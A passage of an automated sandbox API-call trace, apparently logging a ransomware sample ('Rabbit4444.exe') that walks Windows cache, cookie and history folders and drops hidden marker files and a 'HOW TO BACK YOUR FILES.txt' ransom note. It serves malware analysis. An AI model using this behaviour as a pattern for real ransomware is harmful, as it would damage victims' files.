cAlternateFileName="")) returned 1 [0063.170] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.170] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.170] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.170] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.170] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.170] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef90a44, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef90a44, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef90a44, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.170] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.170] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.170] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef90a44, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef90a44, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeef90a44, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.170] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0063.170] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.170] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.171] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.171] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.171] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.171] CloseHandle (hObject=0x2a0) returned 1 [0063.171] CloseHandle (hObject=0x298) returned 1 [0063.172] GetCurrentThreadId () returned 0xd98 [0063.172] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0063.172] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory" [0063.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116930 | out: hHeap=0xe0000) returned 1 [0063.172] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0063.172] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory" [0063.172] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\" [0063.172] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0063.172] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.173] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.177] FlushFileBuffers (hFile=0x298) returned 1 [0063.178] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.178] CloseHandle (hObject=0x298) returned 1 [0063.182] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory") returned 98 [0063.182] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.182] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1bda6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef90a44, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.182] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.182] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.182] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.182] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.182] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1bda6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeef90a44, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.182] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.182] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.182] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.182] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.182] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.182] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef90a44, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef90a44, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeefbff1a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.182] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.182] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.182] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeef90a44, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeef90a44, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeefbff1a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.182] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.182] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.183] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.183] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.183] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.184] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.184] CloseHandle (hObject=0x2a0) returned 1 [0063.184] CloseHandle (hObject=0x298) returned 1 [0063.184] GetCurrentThreadId () returned 0xd98 [0063.184] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0063.184] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies" [0063.184] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116450 | out: hHeap=0xe0000) returned 1 [0063.184] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0063.184] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies" [0063.184] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\" [0063.184] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0063.184] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.185] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.188] FlushFileBuffers (hFile=0x298) returned 1 [0063.189] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.189] CloseHandle (hObject=0x298) returned 1 [0063.190] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies") returned 98 [0063.190] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.190] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1b98c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeefd1625, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0063.190] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.190] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.190] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.190] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.190] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1b98c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeefd1625, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.190] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.190] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.190] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.190] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.190] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.190] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeefd1625, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeefd1625, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeefd9ece, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.190] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.190] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.190] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeefd1625, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeefd1625, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeefd9ece, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.190] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0063.190] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.190] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.191] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.191] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.192] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.192] CloseHandle (hObject=0x2a0) returned 1 [0063.192] CloseHandle (hObject=0x298) returned 1 [0063.192] GetCurrentThreadId () returned 0xd98 [0063.192] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0063.192] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache" [0063.192] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116110 | out: hHeap=0xe0000) returned 1 [0063.192] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0063.192] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache" [0063.192] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\" [0063.192] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0063.192] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.194] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.197] FlushFileBuffers (hFile=0x298) returned 1 [0063.198] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.199] CloseHandle (hObject=0x298) returned 1 [0063.200] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache") returned 96 [0063.200] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.200] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1b57a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeefe6294, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.200] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.200] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.200] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.200] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.201] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x67ede02, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1b57a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeefe6294, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.201] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.201] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.201] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.201] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.201] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.201] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeefe6294, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeefe6294, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeefeeab6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.201] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.201] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.201] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeefe6294, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeefe6294, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeefeeab6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, 